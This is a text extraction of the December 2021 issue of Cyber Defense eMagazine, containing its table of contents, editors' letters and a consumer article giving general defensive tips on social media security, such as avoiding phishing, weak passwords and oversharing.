Cyber Defense eMagazine December Edition for 2021
Will you stay one step ahead of Cyber Scrooge this year? Learn new ways to protect your family, job, company & data. December Cyber Defense eMagazine: Cyber Deception Month is here...Defeat Cyber Scrooge! Cyber Defense Magazine December Edition for 2021 in online format #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group as well as Yan Ross, US Editor-in-Chief, Pieruligi Paganini, International Editor-in-Chief and many more writers, partners and supporters who make this an awesome publication! Thank you all and to our readers! OSINT ROCKS! #CDM #CDMG #OSINT #CYBERSECURITY #INFOSEC #BEST #PRACTICES #TIPS #TECHNIQUES See you at RSA Conference 2022 - Our 10th Year Anniversary - Our 10th Year @RSAC #RSACONFERENCE #USA - Thank you so much!!! - Team CDMG CDMG is a Carbon Negative and Inclusive Media Group.
Will you stay one step ahead of Cyber Scrooge this year? Learn new ways to protect your family, job, company & data. December Cyber Defense eMagazine: Cyber Deception Month is here...Defeat Cyber Scrooge!
Cyber Defense Magazine December Edition for 2021 in online format #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group as well as Yan Ross, US Editor-in-Chief, Pieruligi Paganini, International Editor-in-Chief and many more writers, partners and supporters who make this an awesome publication! Thank you all and to our readers! OSINT ROCKS! #CDM #CDMG #OSINT #CYBERSECURITY #INFOSEC #BEST #PRACTICES #TIPS #TECHNIQUES
See you at RSA Conference 2022 - Our 10th Year Anniversary - Our 10th Year @RSAC #RSACONFERENCE #USA - Thank you so much!!! - Team CDMG
CDMG is a Carbon Negative and Inclusive Media Group.
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
9 Ways Social Media Sabotages Your<br />
<strong>Cyber</strong>security<br />
How Covid-19 Changed Advertising Forever<br />
The Benefits of Hyperautomation<br />
Why Do You Need a Malware Sandbox?<br />
…and much more…<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 1<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
CONTENTS<br />
Welcome to CDM’s <strong>December</strong> <strong>2021</strong> Issue ----------------------------------------------------------------------------------------- 6<br />
9 Ways Social Media Sabotages Your <strong>Cyber</strong>security -----------------------------------------------------------------38<br />
By Alex Lysak, CEO of Scanteam<br />
<strong>Cyber</strong> Crime Is on The Rise and These Experts Have the Knowledge You Need ------------------------------42<br />
By Jon Clemenson, Director of In<strong>for</strong>mation Security, TokenEx<br />
When Diplomacy, Finance and Tech Collide: <strong>Cyber</strong>security Lessons Learned from Years Across Careers<br />
--------------------------------------------------------------------------------------------------------------------------------------49<br />
By Danny Lopez, CEO, Glasswall<br />
How Covid-19 Changed Advertising Forever ---------------------------------------------------------------------------53<br />
By Bernie Brode, product researcher at Microscopic Machines<br />
Why MFA Alone Isn’t Enough <strong>for</strong> True <strong>Cyber</strong>security ----------------------------------------------------------------57<br />
By Bojan Simic, Co-Founder, Interim CEO & CTO, HYPR<br />
Can Your <strong>Cyber</strong>security Culture Stand Up to the Latest Spear Phishing Techniques? -----------------------60<br />
By Josh Yavor, Chief In<strong>for</strong>mation Security Officer, Tessian<br />
3 Best Practices to Avoid Inevitable Ransomware Attacks ---------------------------------------------------------63<br />
By Jesper Zerlang, CEO, LogPoint<br />
The Benefits of Hyperautomation -----------------------------------------------------------------------------------------66<br />
By Nathan Hull, Principal Solutions Architect, Technologent<br />
Electric Vehicle Charging: The Next <strong>Cyber</strong>attack Frontier ----------------------------------------------------------69<br />
By Prof. Thomas R. Köhler, Member of the Board of Juice Technology AG<br />
Will Multi-Factor Authentication (MFA) Implementation Protect Countries from <strong>Cyber</strong>criminals? ----72<br />
By Marcin Szary, CTO and co-founder, Secfense<br />
Why Do You Need a Malware Sandbox? --------------------------------------------------------------------------------76<br />
By ANY.RUN Team<br />
Multi-Cloud Security and Compliance: Challenges & Best Practices ---------------------------------------------79<br />
By Avi Shua, CEO and Co-Founder, Orca Security<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 2<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How Do You Secure the Modern Supply Chain? -----------------------------------------------------------------------83<br />
By Brett Raybould, EMEA Solutions Architect, Menlo Security<br />
Don’t Take Yourself Out of The Game: Mitigating the Risk Of An Organizational Conflict Of Interest In<br />
Federal Contracts --------------------------------------------------------------------------------------------------------------87<br />
By Michelle Litteken, Of Counsel, Morris, Manning & Martin LLP<br />
Is Anti Data Exfiltration the Holy Grail of <strong>Cyber</strong>attack Prevention? ---------------------------------------------92<br />
By Dr. Darren Williams, Founder & CEO, BlackFog, Inc.<br />
Attorney-Client Privilege Communication Best Practices -----------------------------------------------------------96<br />
By Nicole Allen, Marketing Executive, Salt Communications.<br />
The Line-of-Sight <strong>Cyber</strong>security Problem in Healthcare ----------------------------------------------------------- 100<br />
By Samuel Hill, Director of Product Marketing, Medigate<br />
Caution: Personal Data Memorization in Progress ----------------------------------------------------------------- 104<br />
By Patricia Thaine, Co-Founder & CEO, Private AI<br />
Q&A: Roland Cloutier Chief Security Officer Tiktok and Bytedance ------------------------------------------- 108<br />
By Roland Cloutier<br />
Techniques Used by Hackers to Bypass Email Security Solutions ----------------------------------------------- 113<br />
By Michael Aminov, Perception Point<br />
How To Protect Your Digital Legacy ------------------------------------------------------------------------------------ 119<br />
By Jamie Wilson, MD, Cryptoloc Technology Group<br />
Sextortion Email Scams ---------------------------------------------------------------------------------------------------- 123<br />
By Harman Singh, director at Cyphere<br />
Getting Started with Active Directory Security ---------------------------------------------------------------------- 130<br />
By Justin Kohler, Director of BloodHound Enterprise, SpecterOps<br />
Surviving The New Era of Terabit-Class DDoS Attacks ------------------------------------------------------------ 133<br />
By Richard Hummel, Threat Intelligence Lead, NETSCOUTy<br />
<strong>Cyber</strong> (In)Secure: Business Sentiment on <strong>Cyber</strong> Security Challenges ------------------------------------------ 136<br />
By James Edgar, Senior Vice President and Chief In<strong>for</strong>mation Security Officer, FLEETCOR<br />
Enterprises Cannot Achieve Zero Trust Security Without Machine Identity Management -------------- 139<br />
By Murali Palanisamy, chief solutions officer, AppViewX<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 3<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
@MILIEFSKY<br />
From the<br />
Publisher…<br />
Dear Friends,<br />
Looking back over ten years of publishing <strong>Cyber</strong> <strong>Defense</strong> Magazine, it is an honor and pleasure <strong>for</strong> me to report on the growth<br />
of our organization and breadth of our services.<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine has been the central and driving <strong>for</strong>ce in the <strong>Cyber</strong> <strong>Defense</strong> Media Group array of publishing,<br />
advertising, and other valuable media services. Since its initiation 10 years ago, we have published some 3500 articles from<br />
expert authors across the entire spectrum of cybersecurity endeavors.<br />
In addition to the <strong>Cyber</strong> <strong>Defense</strong> Magazine B2B offering, we publish the online B2C <strong>Cyber</strong> Security Magazine. Between the 2<br />
magazines, we provide millions of discrete clicks each month to the benefit of our advertisers, authors, and their companies<br />
– as well as the educational value of bringing actionable in<strong>for</strong>mation to our readers.<br />
<strong>Cyber</strong> <strong>Defense</strong> TV has become a mainstay <strong>for</strong> growing cyber businesses to broadcast their messages and value propositions<br />
to a wide audience of professional and management individuals.<br />
Our Global <strong>Cyber</strong> Awards and Black Unicorn publications have taken center stage <strong>for</strong> our millions of readers and online<br />
audience participants.<br />
As we celebrate 10 years of publishing, we must also look <strong>for</strong>ward to the growing challenges from vulnerabilities and solutions<br />
in cyber activities. Among the first are the 16 sectors of critical Infrastructure and their integrated command and control<br />
support. But we pride ourselves in reaching organizations of all sizes and types, including SMEs, nonprofit, and government<br />
entities.<br />
We are pleased to bring you a broad spectrum of articles with actionable in<strong>for</strong>mation and wish you all success in your own<br />
cyber endeavors.<br />
Warmest regards,<br />
We’ll be celebrating our 10 th Year in business and of our Global InfoSec Awards and as a<br />
Platinum Media Partner of RSA Conference on Feb 7 – 10, 2022 – See You There!<br />
Gary S.Miliefsky, CISSP®, fmDHS<br />
CEO, <strong>Cyber</strong> <strong>Defense</strong> Media Group<br />
Publisher, <strong>Cyber</strong> <strong>Defense</strong> Magazine<br />
P.S. When you share a story or an article or in<strong>for</strong>mation about<br />
CDM, please use #CDM and @<strong>Cyber</strong><strong>Defense</strong>Mag and<br />
@Miliefsky – it helps spread the word about our free resources<br />
even more quickly<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 4<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
@CYBERDEFENSEMAG<br />
CYBER DEFENSE eMAGAZINE<br />
Published monthly by the team at <strong>Cyber</strong> <strong>Defense</strong> Media Group and<br />
distributed electronically via opt-in Email, HTML, PDF and Online<br />
Flipbook <strong>for</strong>mats.<br />
InfoSec Knowledge is Power. We will<br />
always strive to provide the latest, most<br />
up to date FREE InfoSec in<strong>for</strong>mation.<br />
From the International Editor-in-Chief…<br />
Once again, in this month’s review, we see a growing, but<br />
disparate influence of privacy initiatives in the international arena.<br />
If we could liken the movements and reactions to a physical being,<br />
it would look like expansion occurs with breathing in, and<br />
contraction occurs with breathing out. It seems that each time one<br />
of the international or international (including States and<br />
Provinces) take an action to expand its privacy reach, others move<br />
in a conflicting direction.<br />
Ultimately, however, we continue to hope that the efficiencies of<br />
uni<strong>for</strong>mity will prevail – taking into account, of course, the<br />
necessities of cultural and historical differences observed on the<br />
international scene.<br />
Why, one might ask, do we find privacy initiatives influencing<br />
cybersecurity? As it happens, the playing field on which privacy<br />
legislation and regulation take place is largely a cyber-based<br />
structure. The vast majority of personal and sensitive in<strong>for</strong>mation<br />
is transmitted, stored, accessed, and analyzed in cyber space.<br />
Whether in the servers of the affected organization or in the<br />
“cloud” (someone else’s server), compliance with privacy<br />
requirements happens in conjunction with cybersecurity.<br />
As always, we encourage cooperation and compatibility among<br />
nations and international organizations in responding to these<br />
cybersecurity and privacy matters.<br />
To our faithful readers, we thank you,<br />
Pierluigi Paganini<br />
International Editor-in-Chief<br />
INTERNATIONAL EDITOR-IN-CHIEF & CO-FOUNDER<br />
Pierluigi Paganini, CEH<br />
Pierluigi.paganini@cyberdefensemagazine.com<br />
US EDITOR-IN-CHIEF<br />
Yan Ross, JD<br />
Yan.Ross@cyberdefensemediagroup.com<br />
ADVERTISING<br />
Marketing Team<br />
marketing@cyberdefensemagazine.com<br />
CONTACT US:<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine<br />
Toll Free: 1-833-844-9468<br />
International: +1-603-280-4451<br />
SKYPE: cyber.defense<br />
http://www.cyberdefensemagazine.com<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine, a division of CYBER<br />
DEFENSE MEDIA GROUP<br />
1717 Pennsylvania Avenue NW, Suite 1025<br />
Washington, D.C. 20006 USA<br />
EIN: 454-18-8465, DUNS# 078358935.<br />
All rights reserved worldwide.<br />
PUBLISHER<br />
Gary S. Miliefsky, CISSP®<br />
Learn more about our founder & publisher at:<br />
http://www.cyberdefensemagazine.com/about-our-founder/<br />
9+ YEARS OF EXCELLENCE!<br />
Providing free in<strong>for</strong>mation, best practices, tips, and techniques<br />
on cybersecurity since 2012, <strong>Cyber</strong> <strong>Defense</strong> magazine is your<br />
go-to-source <strong>for</strong> In<strong>for</strong>mation Security. We’re a proud division<br />
of <strong>Cyber</strong> <strong>Defense</strong> Media Group:<br />
CYBERDEFENSEMEDIAGROUP.COM<br />
MAGAZINE TV RADIO AWARDS<br />
PROFESSIONALS<br />
VENTURES<br />
WEBINARS<br />
CYBERSECURITYMAGAZINE (FOR CONSUMERS)<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 5<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Welcome to CDM’s <strong>December</strong> <strong>2021</strong> Issue<br />
From the U.S. Editor-in-Chief<br />
As we complete the year <strong>2021</strong> in our publishing rotation, we can see patterns developing and extending<br />
into the future. The breadth of topics among the 26 articles in the <strong>December</strong> issue of <strong>Cyber</strong> <strong>Defense</strong><br />
Magazine reflect the perceived concerns and (in many cases) solutions offered by our contributing<br />
authors.<br />
This enlightening view of current industry challenges provides, among other benefits, both high-altitude<br />
observations and down-to-earth granular analysis of the developments in cybersecurity today.<br />
Take a moment to read through the Table of Contents. You will see numerous articles you will find of<br />
immediate interest. That is representative of how <strong>Cyber</strong> <strong>Defense</strong> Magazine strives to bring our readers<br />
actionable intelligence from highly knowledgeable cyber professionals.<br />
Once again, the articles this month cover a broad spectrum of threats, preventive measures, ways to<br />
assure resilience and sustainability, and operational advice <strong>for</strong> organizations needing to maintain the<br />
confidentiality, accessibility, and integrity of sensitive data.<br />
We believe <strong>Cyber</strong> <strong>Defense</strong> Magazine is most valuable to our readers by keeping current on emerging<br />
trends and solutions in the world of cybersecurity, and we use that guide as our pole star in undertaking<br />
this journey with our readers.<br />
Wishing you all success in your cybersecurity endeavors,<br />
Yan Ross<br />
US Editor-in-Chief<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine<br />
About the US Editor-in-Chief<br />
Yan Ross, J.D., is a <strong>Cyber</strong>security Journalist & U.S. Editor-in-Chief of <strong>Cyber</strong><br />
<strong>Defense</strong> Magazine. He is an accredited author and educator and has<br />
provided editorial services <strong>for</strong> award-winning best-selling books on a variety<br />
of topics. He also serves as ICFE's Director of Special Projects, and the author<br />
of the Certified Identity Theft Risk Management Specialist ® XV CITRMS®<br />
course. As an accredited educator <strong>for</strong> over 20 years, Yan addresses risk management in the areas of identity theft,<br />
privacy, and cyber security <strong>for</strong> consumers and organizations holding sensitive personal in<strong>for</strong>mation. You can reach<br />
him by e-mail at yan.ross@cyberdefensemediagroup.com<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 6<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 7<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 8<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 9<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 10<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 11<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 12<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 13<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 14<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 15<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 16<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 17<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 18<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 19<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 20<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 21<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 22<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 23<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 24<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 25<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 26<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 27<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 28<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 29<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 30<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 31<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 32<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 33<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 34<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 35<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 36<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 37<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
9 Ways Social Media Sabotages Your <strong>Cyber</strong>security<br />
By Alex Lysak, CEO of Scanteam<br />
Social media has become one of the most common ways to spend time online, with many of the world's<br />
most popular websites offering social features. Social media is described as a digital plat<strong>for</strong>m that allows<br />
users to create an account, share content and interact with other users. Main examples include sites<br />
such as Facebook, Twitter, and Instagram, but there are hundreds of different social media sites, each<br />
offering a unique set of features and catering to different groups of people.<br />
Social media is perfect <strong>for</strong> connecting with friends and family, as well as sharing ideas and content with<br />
people from all over the world. It's also a great place <strong>for</strong> businesses to interact with their potential<br />
consumers, engaging with them and advertising to them. One of the reasons why social media sites have<br />
become so successful is that they sell personal data to companies <strong>for</strong> advertising purposes. Brands can<br />
target people based on their age, location, and likes, reaching their target demographics more easily.<br />
Although social media is very popular, with over half of the world's population now owning at least one<br />
account, it does raise issues about cybersecurity. When signing up to a social media site, users need to<br />
be careful that they're not compromising their data, falling victim to data leaks, or downloading malware.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 38<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
With over 4 billion users, social media plat<strong>for</strong>ms present a big target <strong>for</strong> hackers, scammers, and identity<br />
thieves. As a result, it pays to be careful about the plat<strong>for</strong>m you use and how you use it. In this article,<br />
our US cybersecurity expert Alex Lysak will be looking at nine different ways social media and<br />
cybersecurity are connected and how to practice social media safety.<br />
What is <strong>Cyber</strong>security?<br />
<strong>Cyber</strong>security is the practice of protecting devices or networks from cyber-attacks, malware or other<br />
online threats. These cyberattacks are typically aimed at gaining access to, altering, or destroying<br />
sensitive data, extorting money from users, or disrupting normal corporate activities. Whether you're an<br />
individual or a company, cybercriminals don't discriminate, and you need to be able to protect your<br />
devices and data from cyber security threats.<br />
Because there are more devices than humans nowadays, and attackers are growing more inventive,<br />
putting in place effective cybersecurity measures is very difficult. Over the last few years, there has been<br />
a rise in the number of high-profile cyber-attacks, particularly those using ransomware. This type of<br />
malware encrypts a user's data, making it useless unless the user gives in to demands and pays a<br />
ransom.<br />
Hackers often demand payment in the <strong>for</strong>m of cryptocurrency, which has the advantage of being much<br />
easier to use than other <strong>for</strong>ms of online payment. Payments made using cryptocurrencies have increased<br />
a lot over the past few years, as researched by Scanteam, this is partly thanks to the added level of<br />
security as well as the potential anonymity.<br />
Protecting Yourself While Using social media<br />
Although you can use antivirus software and other tools to keep your device secure from threats, the best<br />
way to stay safe online is by taking the right precautions. By following good practices while online, you<br />
can avoid malware and stay safe from cyber-attacks, including those on social media.<br />
Here are a few of the things to avoid or be careful of when using social media if you want to stay secure:<br />
Providing Too Much Personal In<strong>for</strong>mation<br />
When using social media, users often fill out their profiles without caring much about who sees them.<br />
Although it may seem innocuous to provide details on your birthday, your family members, where you<br />
grew up, and more, it can put you at risk. By publishing so much in<strong>for</strong>mation about yourself online, you<br />
can be affecting your cybersecurity, making it easier <strong>for</strong> hackers to gain entry to your accounts or <strong>for</strong><br />
identity thieves to open up credit cards or bank accounts in your name.<br />
Additionally, you should also be careful about the contact details you provide, as scammers will often<br />
look <strong>for</strong> email addresses and phone numbers. When combined with your personal in<strong>for</strong>mation, they can<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 39<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
use this to create highly believable scams aimed at extracting money from your accounts. Privacy is one<br />
of the most important social media security issues, and users should be more careful about their personal<br />
in<strong>for</strong>mation.<br />
Phishing Scams<br />
A phishing scam is one of the most common types of online scams, where scammers use social<br />
engineering to get the in<strong>for</strong>mation they want. This type of social engineering involves an attacker sending<br />
a phony message to a human target in the hopes of obtaining sensitive in<strong>for</strong>mation. In addition, the scam<br />
could also involve or deploy harmful software on the victim's infrastructure, such as ransomware.<br />
When using social media, you should always be wary of messages you receive, especially from people<br />
you don't know. Sometimes it could even appear to be someone you know sending a phishing message,<br />
either through a hacked account or a fake profile.<br />
Insecure Passwords<br />
Passwords are essential <strong>for</strong> keeping your accounts secure, and you should always make sure to use<br />
strong passwords no matter what kind of account it is. Using weak passwords is asking <strong>for</strong> trouble, as it<br />
means hackers can easily break into your account. Not only that, but you should also avoid reusing<br />
passwords on multiple accounts. You shouldn’t use the same password <strong>for</strong> your online banking and your<br />
Facebook account, <strong>for</strong> example.<br />
Single Layer Security<br />
Passwords aren't the only thing you should use to secure your account; many online sites also offer twofactor<br />
authentication or digital ID. This is where the site will send a code to your phone <strong>for</strong> you to use as<br />
well as your password. You should definitely set this up, as it means that even if hackers manage to<br />
crack your password, they won't be able to get access to your account.<br />
Outdated Apps<br />
Social media apps are constantly updated to remove bugs and exploits that make them vulnerable to<br />
social networking security threats. If you want your device to stay safe, make sure the app you're using<br />
is up to date, and if you're not sure, you can check to see if updates are available. Additionally, you can<br />
set the app to update automatically when new software patches are released.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 40<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Unsecure Mobile Networks<br />
When using social media on a mobile device, you should be careful about which networks you connect<br />
to. Using mobile data in the US is fine but connecting to open Wi-Fi networks is often a risk. When you<br />
connect to an unsecured mobile network, you could be opening your device up to malware and cyberattacks.<br />
Malware Links<br />
Malware links are rare on social media as they often get reported and taken down. However, you can still<br />
find plenty of examples of social media cyber-attacks through malware being spread over various<br />
plat<strong>for</strong>ms, particularly through private messages. If you don't know the person, never open the link and<br />
be very careful about what links you open in general.<br />
Tags and Locations<br />
Part of the fun of social media is tagging friends in photos and sharing your location. However, this can<br />
potentially put you at risk. Be careful about sharing your location online, especially as you never know<br />
who can see this in<strong>for</strong>mation. Some people in the US have had their homes robbed after revealing their<br />
location on social media, and it can be a cybersecurity risk too.<br />
Poor Privacy Controls<br />
When using social media, you're in control over who gets to see the content that you share, but you do<br />
need to adjust the privacy settings to change this. Make sure you revisit this often to prevent people not<br />
connected to you from accessing your personal data and ensure proper data security.<br />
About the Author<br />
Alex Lysak is working in online marketing since 2011, his main<br />
areas of expertise are marketing research, social media marketing,<br />
and SEO. During 9+ years of experience, he has helped many<br />
products and startups to develop marketing strategies and to<br />
implement them further. Alex Lysak can be reached online at<br />
alexlysak.scanteam.pro@gmail.com or Twitter and at our<br />
company website https://scanteam.pro/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 41<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> Crime Is on The Rise and These Experts Have the<br />
Knowledge You Need<br />
By Jon Clemenson, Director of In<strong>for</strong>mation Security, TokenEx<br />
Nearly every day, there’s news about another major cyberattack on a large organization. We are living in<br />
